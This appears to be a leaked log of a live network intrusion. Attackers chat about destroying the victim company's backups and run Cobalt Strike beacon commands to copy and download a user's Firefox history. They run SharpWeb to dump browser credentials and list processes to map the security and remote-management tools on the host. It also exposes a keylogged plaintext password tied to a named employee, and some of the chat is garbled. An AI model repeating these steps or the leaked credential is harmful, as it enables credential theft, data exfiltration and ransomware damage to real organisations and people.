What's the host and what's nimbla's host? and he has a fat history there + he's gone out of his messages?) I'm waiting for the last files and we won't leave until tomorrow. What about ff? so we haven't found nimbla access and close this network tomorrow by 6 let's finish with backups today. everywhere you touch backups, the whole network is full of backups. if not, we miss it. it's not certain that there is any, but you should look for ithtp://www://www.solarwinds.com/company/press-releases/2018-q1/solarwinds-introduces-cloud-first-backup-ѕervisetcurrent?[ ](https://mediaeveryone.com/group/waterway-com?msg=nXNNWJGfqQRE3tnBE) yeah no, it's monitoringc by the way there may be backups too it is solarwindsno @user7 seemed to find accesses? change without .back and see what is it delete it tamag, take back version ``
beacon> shell copy places.sqlite places.sqlite.back
[*] Tasked beacon to run: copy places.sqlite places.sqlite.back
[+] host called home, sent: 68 bytes
[+] received output:
        1 file(s) copied.

``in the keylog?``https://192.168.0.254 mharper@waterway.com LoveUnit14* ``:thinking:``places.sqlite places.sqlite.back``?
shell copy places.sqlite
``Try and try to make it with places, I'm losing my mind.``
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 01/05/2021 09:46:52 bookmarkbackups
          dir 11/16/2020 21:37:15 browser-extension-data
          dir 01/04/2021 14:56:52 crashes
          dir 01/05/2021 12:48:45:45 datareporting
          dir 12/17/2020 09:33:11 extensions
          dir 09/04/2020 13:15:30 gmp
          dir 04/28/2020 08:26:45 gmp-gmpopenh264
          dir 04/28/2020 08:26:46 gmp-widevinecdm
          dir 10/19/2020 16:22:05 minidumps
          dir 01/05/2021 03:08:07 saved-telemetry-pings
          dir 04/28/2020 08:26:46 security_state
          dir 01/05/2021 12:48:46 sessionstore-backups
          dir 12/31/2020 10:12:55 shader-cache
          dir 04/28/2020 08:21:23 storage
          dir 01/05/2021 12:43:45 weave
 28kb fil 01/05/2021 08:53:22 addons.json
 3kb fil 01/04/2021 14:58:43 addonStartup.json.lz4
 0b fil 01/04/2021 14:20:20 AlternateServices.txt
 3kb fil 01/05/2021 12:43:47 autofill-profiles.json
 216b fil 01/05/2021 12:06:12 broadcast-listeners.json
 352kb fil 12/21/2020 09:14:06 cert9.db
 11kb fil 12/21/2020 09:14:06 cert_override.txt
 0b fil 01/04/2021 14:20:20 ClientAuthRememberList.txt
 199b fil 12/23/2020 10:29:42 compatibility.ini
 1024b fil 08/17/2020 10:57:55 containers.json
 224kb fil 12/31/2020 11:18:27 content-prefs.sqlite
 1024kb fil 01/05/2021 12:48:43 cookies.sqlite
 32kb fil 01/04/2021 14:55:55 cookies.sqlite-shm
 0b fil 01/04/2021 14:55:55 cookies.sqlite-wal
 132b fil 08/03/2020 14:38:42 enumerate_devices.txt
 1kb fil 11/16/2020 21:37:17 extension-preferences.json
 470b fil 01/04/2021 14:55:57 extension-settings.json
 90kb fil 01/05/2021 08:55:23 extensions.json
 10mb fil 01/04/2021 14:17:59 favicons.sqlite
 32kb fil 01/04/2021 14:55:55 favicons.sqlite-shm
 320kb fil 01/04/2021 15:13:24 favicons.sqlite-wal
 864kb fil 01/05/2021 11:52:07 formhistory.sqlite
 1kb fil 12/31/2020 10:59:25 handlers.json
 16kb fil 08/15/2019 11:32:20 key3.db
 288kb fil 08/15/2019 11:32:20 key4.db
 3kb fil 01/05/2021 03:08:07 logins-backup.json
 3kb fil 01/05/2021 09:08:12 logins.json
 18kb fil 12/31/2020 12:15:22 notificationstore.json
 0b fil 01/04/2021 14:55:55 parent.lock
 96kb fil 01/04/2021 15:30:37 permissions.sqlite
 507b fil 04/28/2020 08:21:23 pkcs11.txt
 25mb fil 01/05/2021 11:52:08 places.sqlite
 32kb fil 01/04/2021 14:55:55 places.sqlite-shm
 3mb fil 01/05/2021 11:52:08 places.sqlite-wal
 1kb fil 12/24/2020 09:30:13 pluginreg.dat
 29kb fil 01/05/2021 12:43:45 prefs.js
 64kb fil 01/04/2021 14:57:35 protections.sqlite
 532b fil 01/04/2021 14:55:57 search.json.mozlz4
 0b fil 01/04/2021 14:20:20 SecurityPreloadState.txt
 11kb fil 01/04/2021 14:56:02 serviceworker.txt
 90b fil 01/04/2021 14:55:56 sessionCheckpoints.json
 2kb fil 01/05/2021 12:05:42
 3kb fil 01/05/2021 09:08:10 signedInUser.json
 53kb fil 01/05/2021 12:48:58 SiteSecurityServiceState.txt
 32kb fil 08/01/2020 09:29:18 storage-sync-v2.sqlite
 32kb fil 01/04/2021 14:57:39 storage-sync-v2.sqlite-shm
 1mb fil 12/16/2020 12:00:52 storage-sync-v2.sqlite-wal
 128kb fil 07/29/2020 19:52:03 storage-sync.sqlite
 22kb fil 01/04/2021 14:55:56 storage.sqlite
 47b fil 04/28/2020 08:21:19 times.json
 13mb fil 01/04/2021 15:09:04 webappsstore.sqlite
 32kb fil 01/04/2021 14:55:55 webappsstore.sqlite-shm
 704kb fil 01/04/2021 15:47:03 webappsstore.sqlite-wal
 1kb fil 01/05/2021 12:20:58 xulstore.json
``Give me the profile listing I can't find it and take the second one and make a copy History History.back```
====== FirefoxHistory ======

ERROR: IO exception, places.sqlite file likely in use (i.e. Firefox is likely running). The process cannot access the file 'C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite' because it is being used by another process.

    History (mharper):
``I'll compare if it's ok, we'll just take the history just in case and give me both files``.
places.sqlite
This file contains all your Firefox bookmarks and lists of all the files you've downloaded and websites you've visited.
``History''.
beacon> download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite
[*] Tasked beacon to download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite
[+] host called home, sent: 110 bytes
[*] started download of C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite (26214400 bytes)
[+] received output:
[-] Invoke_3 on EntryPoint failed.

I wonder where he went through his History file, I guess it's time to look for an alternative, I told you, he's the usual
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===
  [X] Exception: Key not valid for use in specified state.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.
If it works, give me the output I told you about it so sharpweb?)[ ](https://mediaeveryone.com/group/waterway-com?msg=gFhMrXxoJgABq7xWQ) than shoot it, check if the backups are up to date, give ffu only chrome, it must have worked in the fall have you? I have not worked at all)sharpweb as usual and you and chrome ffu have pulled?
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 2195:13:43 N/A
System 4 Services 0 4,980 K Unknown NT AUTHORITY\SYSTEM 32:36:26 N/A
Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
Registry 152 Services 0 78,556 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A
smss.exe 740 Services 0 1,032 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 1144 Services 0 3,304 K Unknown NT AUTHORITY\SYSTEM 0:01:06 N/A
wininit.exe 1236 Services 0 2,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 1244 Console 1 19,380 K Running NT AUTHORITY\SYSTEM 0:04:58 N/A
services.exe 1308 Services 0 13,988 K Unknown NT AUTHORITY\SYSTEM 0:03:53 N/A
LsaIso.exe 1320 Services 0 2,100 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
lsass.exe 1336 Services 0 26,320 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A
svchost.exe 1460 Services 0 2,332 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1484 Services 0 37,304 K Unknown NT AUTHORITY\SYSTEM 0:03:38 N/A
WUDFHost.exe 1508 Services 0 2,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
fontdrvhost.exe 1536 Services 0 1,548 K Unknown Font Driver Host\UMFD-0 0:00:07 N/A
svchost.exe 1604 Services 0 21,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:07:21 N/A
svchost.exe 1652 Services 0 8,252 K Unknown NT AUTHORITY\SYSTEM 0:01:47 N/A
winlogon.exe 1748 Console 1 18,156 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A
fontdrvhost.exe 1812 Console 1 8,048 K Unknown Font Driver Host\UMFD-1 0:03:45 N/A
svchost.exe 1936 Services 0 18,244 K Unknown NT AUTHORITY\NETWORK SERVICE 0:04:46 N/A
svchost.exe 1952 Services 0 3,888 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1964 Services 0 6,180 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
dwm.exe 1992 Console 1 116,224 K Running Window Manager\DWM-1 1:22:41 DWM Notification Window
svchost.exe 2000 Services 0 2,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1096 Services 0 4,480 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:37 N/A
svchost.exe 1596 Services 0 4,944 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1648 Services 0 6,040 K Unknown NT AUTHORITY/LOCAL SERVICE 0:00:00 N/A
svchost.exe 876 Services 0 7,480 K Unknown NT AUTHORITY/NETWORK SERVICE 0:14:02 N/A
svchost.exe 2124 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2300 Services 0 22,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A
svchost.exe 2352 Services 0 21,184 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:03 N/A
svchost.exe 2424 Services 0 8,128 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:57 N/A
NVDisplay.Container.exe 2452 Services 0 7,964 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2472 Services 0 7,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2600 Services 0 7,420 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:50 N/A
svchost.exe 2724 Services 0 5,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:08 N/A
svchost.exe 2792 Services 0 21,376 K Unknown NT AUTHORITY\SYSTEM 0:06:22 N/A
svchost.exe 2836 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2844 Services 0 7,832 K Unknown NT AUTHORITY\SYSTEM 0:14:02 N/A
svchost.exe 2856 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2864 Services 0 5,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 2872 Services 0 11,080 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
Memory Compression 3064 Services 0 430,432 K Unknown NT AUTHORITY\SYSTEM 0:05:03 N/A
svchost.exe 2536 Services 0 6,624 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 3104 Services 0 5,832 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 3140 Services 0 6,612 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3148 Services 0 6,960 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A
svchost.exe 3340 Services 0 5,788 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3608 Services 0 3,948 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A
spaceman.exe 3640 Services 0 716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3712 Services 0 7,372 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A
svchost.exe 3764 Services 0 4,756 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3988 Services 0 11,608 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A
svchost.exe 4084 Services 0 19,856 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A
svchost.exe 3204 Services 0 4,208 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 3136 Services 0 3,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 8 Services 0 3,436 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4172 Services 0 6,224 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
spoolsv.exe 4268 Services 0 28,488 K Unknown NT AUTHORITY\SYSTEM 0:00:25 N/A
vmms.exe 4640 Services 0 14,652 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
BASupSrvcUpdater.exe 4648 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A
armsvc.exe 4656 Services 0 2,852 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
VmsWebGateway.exe 4664 Services 0 47,684 K Unknown NT AUTHORITY\SYSTEM 0:23:36 N/A
3CXWMRemoteControlSvc.exe 4672 Services 0 2,972 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4680 Services 0 7,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 4688 Services 0 2,956 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 4704 Services 0 33,592 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A
BASupSrvc.exe 4720 Services 0 23,504 K Unknown NT AUTHORITY\SYSTEM 0:07:03 N/A
DymoPnpService.exe 4732 Services 0 4,460 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4740 Services 0 34,384 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:11 N/A
AdobeUpdateService.exe 4748 Services 0 3,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PcmService.exe 4756 Services 0 10,676 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4772 Services 0 3,248 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SDFSSvc.exe 4764 Services 0 9,532 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A
svchost.exe 4780 Services 0 1,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
vmware-authd.exe 4796 Services 0 6,124 K Unknown NT AUTHORITY\SYSTEM 0:13:46 N/A
EPUpdateService.exe 4804 Services 0 9,680 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A
sqlwriter.exe 4812 Services 0 3,068 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SDUpdSvc.exe 4820 Services 0 14,560 K Unknown NT AUTHORITY\SYSTEM 0:00:50 N/A
RtkAudUService64.exe 4828 Services 0 3,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
IpOverUsbSvc.exe 4836 Services 0 4,736 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4844 Services 0 36,140 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:28 N/A
svchost.exe 4860 Services 0 13,024 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
bdredline.exe 4868 Services 0 10,680 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4876 Services 0 7,516 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A
NCentralLauncherService.e 4896 Services 0 11,280 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4904 Services 0 3,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
RedGate.Client.Service.ex 4912 Services 0 27,480 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
EPIntegrationService.exe 4920 Services 0 14,488 K Unknown NT AUTHORITY\SYSTEM 0:01:31 N/A
vmnetdhcp.exe 4936 Services 0 2,716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
mDNSResponder.exe 4944 Services 0 4,056 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 4952 Services 0 2,768 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AGMService.exe 4960 Services 0 9,396 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
agent.exe 4972 Services 0 244,776 K Unknown NT AUTHORITY\SYSTEM 0:13:16 N/A
wgsslvpnsrc.exe 4980 Services 0 2,796 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
EPProtectedService.exe 5008 Services 0 6,552 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
vmware-usbarbitrator64.ex 5036 Services 0 3,968 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
EPSecurityService.exe 5048 Services 0 332,708 K Unknown NT AUTHORITY\SYSTEM 3:07:02 N/A
vmnat.exe 5124 Services 0 3,480 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AGSService.exe 5144 Services 0 8,696 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
CptService.exe 5156 Services 0 2,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
TeamViewer_Service.exe 5384 Services 0 5,952 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 5392 Services 0 3,520 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A
svchost.exe 5508 Services 0 5,976 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 5540 Services 0 3,440 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 5580 Services 0 5,104 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
SDWSCSvc.exe 5612 Services 0 5,748 K Unknown NT AUTHORITY\SYSTEM 0:01:39 N/A
svchost.exe 5808 Services 0 5,472 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
dasHost.exe 5932 Services 0 7,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 6804 Services 0 4,624 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A
GWCtlSrv.exe 7056 Services 0 129,840 K Unknown NT AUTHORITY\SYSTEM 1:04:01 N/A
unsecapp.exe 7416 Services 0 4,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dasHost.exe 7920 Services 0 1,780 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A
svchost.exe 8480 Services 0 4,196 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
vmcompute.exe 8552 Services 0 2,560 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 9192 Services 0 4,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 8084 Services 0 3,156 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dllhost.exe 9356 Services 0 6,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
WmiPrvSE.exe 9456 Services 0 44,636 K Unknown NT AUTHORITY\SYSTEM 0:17:58 N/A
svchost.exe 11224 Services 0 4,700 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
NableSixtyFourBitManager.     9308 Services 0 35,324 K Unknown NT AUTHORITY\SYSTEM 0:18:15 N/A
conhost.exe 9280 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
NableReactiveManagement.e 8436 Services 0 15,752 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
conhost.exe 8432 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 10260 Services 0 13,796 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 11552 Services 0 8,116 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
SolarWinds.MSP.CacheServi 10272 Services 0 24,052 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A
SolarWinds.MSP.RpcServerS 12376 Services 0 17,752 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
NVDisplay.Container.exe 12824 Console 1 23,560 K Running NT AUTHORITY\SYSTEM 0:00:12 NvSvc
svchost.exe 13072 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:47 N/A
svchost.exe 3972 Services 0 9,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
cmd.exe 10692 Services 0 3,472 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 3472 Services 0 4,636 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
powershell.exe 9392 Services 0 8,312 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
ALEService.exe 6424 Services 0 278,392 K Unknown WATERWAY\Administrator 25:54:25 N/A
SgrmBroker.exe 9920 Services 0 6,524 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
SolarWinds.MSP.PME.Agent.    10480 Services 0 6,140 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AgentMaint.exe 8472 Services 0 12,552 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
NableAVDBridge.exe 1080 Services 0 20,836 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
conhost.exe 3952 Services 0 8,588 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
svchost.exe 12600 Services 0 6,264 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 5348 Services 0 8,256 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A
svchost.exe 13084 Services 0 14,636 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
WmiPrvSE.exe 11176 Services 0 18,112 K Unknown NT AUTHORITY\SYSTEM 0:12:50 N/A
svchost.exe 12772 Services 0 12,884 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
EPConsole.exe 10036 Console 1 980 K Running WATERWAY\mharper 0:01:24 DeviceScanInvisibleDialog
sihost.exe 8052 Console 1 26,364 K Running WATERWAY\mharper 0:00:59 N/A
svchost.exe 13196 Console 1 34,052 K Unknown WATERWAY\mharper 0:02:50 N/A
svchost.exe 5636 Console 1 28,584 K Running WATERWAY\mharper 0:00:15 N/A Windows Push Notifications Platform
svchost.exe 3496 Services 0 20,100 K Unknown NT AUTHORITY\SYSTEM 0:02:27 N/A
svchost.exe 12876 Services 0 5,884 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
explorer.exe 7964 Console 1 161,740 K Running WATERWAY\mharper 0:09:58 N/A
svchost.exe 12656 Console 1 23,688 K Running WATERWAY\mharper 0:00:11 N/A
StartMenuExperienceHost.e 12852 Console 1 71,244 K Running WATERWAY\mharper 0:00:06 Start
RuntimeBroker.exe 11180 Console 1 10,820 K Unknown WATERWAY\mharper 0:00:01 N/A
PowerToys.exe 3224 Console 1 16,996 K Running WATERWAY\mharper 0:02:35 N/A
SearchUI.exe 1740 Console 1 191,720 K Running WATERWAY\mharper 0:01:01 N/A
RuntimeBroker.exe 9124 Console 1 33,680 K Running WATERWAY\mharper 0:00:18 N/A
SecurityHealthSystray.exe 13596 Console 1 8,472 K Running WATERWAY\mharper 0:00:07 N/A
SecurityHealthService.exe 13616 Services 0 12,748 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A
svchost.exe 14072 Services 0 9,028 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SetPoint.exe 1872 Console 1 10,252 K Running WATERWAY\mharper 0:00:07 N/A
KHALMNPR.exe 13780 Console 1 9,236 K Running WATERWAY\mharper 0:00:16 KHALHIDC_MainWindow
RtkAudUService64.exe 14060 Console 1 6,916 K Running WATERWAY\mharper 0:00:00 RealtekAudioBackgroundProcessClass
svchost.exe 8320 Services 0 7,180 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
RuntimeBroker.exe 14364 Console 1 19,484 K Unknown WATERWAY\mharper 0:00:45 N/A
LogiOptions.exe 14388 Console 1 9,392 K Running WATERWAY\mharper 0:01:37 LOGI_RAWINPUT_WND
LogiOptionsMgr.exe 14516 Console 1 29,380 K Running WATERWAY\mharper 0:09:59 LDEVICEMGR_WINDOW_{49DCDDA1-BF03-46BC-B469-59A0616325A2}
LogiOverlay.exe 14528 Console 1 61,356 K Running WATERWAY\mharper 0:00:44 WISPTIS
StreamDeck.exe 14624 Console 1 47,372 K Running WATERWAY\mharper 2:09:20 NVOpenGLPbuffer
OneDrive.exe 14836 Console 1 38,668 K Running WATERWAY\mharper 0:00:27 DDE Server Window
flux.exe 15676 Console 1 19,472 K Running WATERWAY\mharper 0:00:39 f.lux: Softer during the day, Warm before bed
CCleaner64.exe 15592 Console 1 45,016 K Running WATERWAY\mharper 0:01:12 N/A
GlassWire.exe 15532 Console 1 65,324 K Running WATERWAY\mharper 0:02:22 GlassWire
svchost.exe 15548 Services 0 16,388 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
QtWebEngineProcess.exe 15568 Console 1 8,100 K Unknown WATERWAY\mharper 0:00:00 N/A
svchost.exe 16508 Services 0 6,152 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:00 N/A
com.barraider.spotify.exe 16832 Console 1 10,068 K Unknown WATERWAY\mharper 0:00:10 N/A
conhost.exe 18784 Console 1 4,088 K Unknown WATERWAY\mharper 0:00:00 N/A
com.barraider.streamcount 18836 Console 1 37,360 K Running WATERWAY\mharper 0:24:35 .NET-BroadcastEventWindow.4.0.0.0.37a9c05.0
QtWebEngineProcess.exe 18844 Console 1 12,188 K Unknown WATERWAY\mharper 0:00:00 N/A
conhost.exe 18856 Console 1 4,104 K Unknown WATERWAY\mharper 0:00:00 N/A
cpu.exe 18984 Console 1 4,780 K Unknown WATERWAY\mharper 0:00:25 N/A
conhost.exe 18992 Console 1 4,100 K Unknown WATERWAY\mharper 0:00:00 N/A
com.nicollasr.streamdeckv 19016 Console 1 14,940 K Running WATERWAY\mharper 0:00:07 OleMainThreadWndName
conhost.exe 19048 Console 1 3,984 K Unknown WATERWAY\mharper 0:00:00 N/A
twitchstudiostreamdeck.ex 19056 Console 1 3,624 K Unknown WATERWAY\mharper 0:00:00 N/A
conhost.exe 19072 Console 1 3,988 K Unknown WATERWAY\mharper 0:00:00 N/A
ColorPicker.exe 20096 Console 1 9,928 K Running WATERWAY\mharper 0:00:05 MediaContextNotificationWindow
PowerLauncher.exe 20412 Console 1 131,324 K Running WATERWAY\mharper 0:02:46 Hidden Window
CCXProcess.exe 19820 Console 1 2,372 K Unknown WATERWAY\mharper 0:00:00 N/A
node.exe 19840 Console 1 13,504 K Unknown WATERWAY\mharper 0:00:21 N/A
conhost.exe 19876 Console 1 4,084 K Unknown WATERWAY\mharper 0:00:00 N/A
Screenpresso.exe 19996 Console 1 25,832 K Running WATERWAY\mharper 0:00:11 N/A
AdobeIPCBroker.exe 20912 Console 1 6,108 K Running WATERWAY\mharper 0:00:02 N/A
NCentralRRDLdr.exe 14720 Console 1 7,892 K Running WATERWAY\mharper 0:00:06 N/A
3CXWin8Phone.exe 21632 Console 1 123,544 K Running WATERWAY\mharper 0:44:55 3CX - 3592 Mark Harper
BASupSrvcCnfg.exe 21872 Console 1 12,808 K Running WATERWAY\mharper 0:11:53 IncomingVoIPCallTrayForm
acrotray.exe 13696 Console 1 16,756 K Running WATERWAY\mharper 0:00:00 AcrobatTrayIcon
WScheduler.exe 23000 Console 1 5,364 K Running WATERWAY\mharper 0:01:44 WScheduler
SDTray.exe 23544 Console 1 17,668 K Running WATERWAY\mharper 0:01:15 Spybot - Search & Destroy 2
ShellExperienceHost.exe 17392 Console 1 56,400 K Running WATERWAY\mharper 0:00:12 New notification
RuntimeBroker.exe 20748 Console 1 19,832 K Running WATERWAY\mharper 0:00:00 N/A
GWIdlMon.exe 25244 Console 1 7,004 K Running WATERWAY\mharper 0:00:16 GlassWireIdleMonitorWn
conhost.exe 25252 Console 1 3,992 K Unknown WATERWAY\mharper 0:00:00 N/A
svchost.exe 25592 Console 1 13,172 K Unknown WATERWAY\mharper 0:00:00 N/A
WinStore.App.exe 7836 Console 1 688 K Running WATERWAY\mharper 0:00:01 N/A
ApplicationFrameHost.exe 25828 Console 1 23,108 K Running WATERWAY\mharper 0:00:02 Calculator
RuntimeBroker.exe 24008 Console 1 14,084 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName
AcrobatNotificationClient 25972 Console 1 6,372 K Running WATERWAY\mharper 0:00:00 N/A
AdobeNotificationClient.e 25996 Console 1 14,900 K Running WATERWAY\mharper 0:00:00 N/A
AcrobatNotificationClient 26052 Console 1 6,404 K Running WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 16240 Console 1 14,568 K Unknown WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 25876 Console 1 14,396 K Unknown WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 25888 Console 1 11,688 K Unknown WATERWAY\mharper 0:00:00 N/A
CompPkgSrv.exe 23576 Console 1 6,024 K Unknown WATERWAY\mharper 0:00:00 N/A
SystemSettings.exe 22688 Console 1 644 K Running WATERWAY\mharper 0:00:00:00 Settings
svchost.exe 21296 Services 0 5,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
taskhostw.exe 26116 Console 1 15,672 K Running WATERWAY\mharper 0:00:00 Task Host Window
WindowsInternal.composabl 27044 Console 1 41,168 K Running WATERWAY\mharper 0:00:14 Microsoft Text Input Application
rundll32.exe 26128 Console 1 5,896 K Running WATERWAY\mharper 0:00:00 OleMainThreadWndName
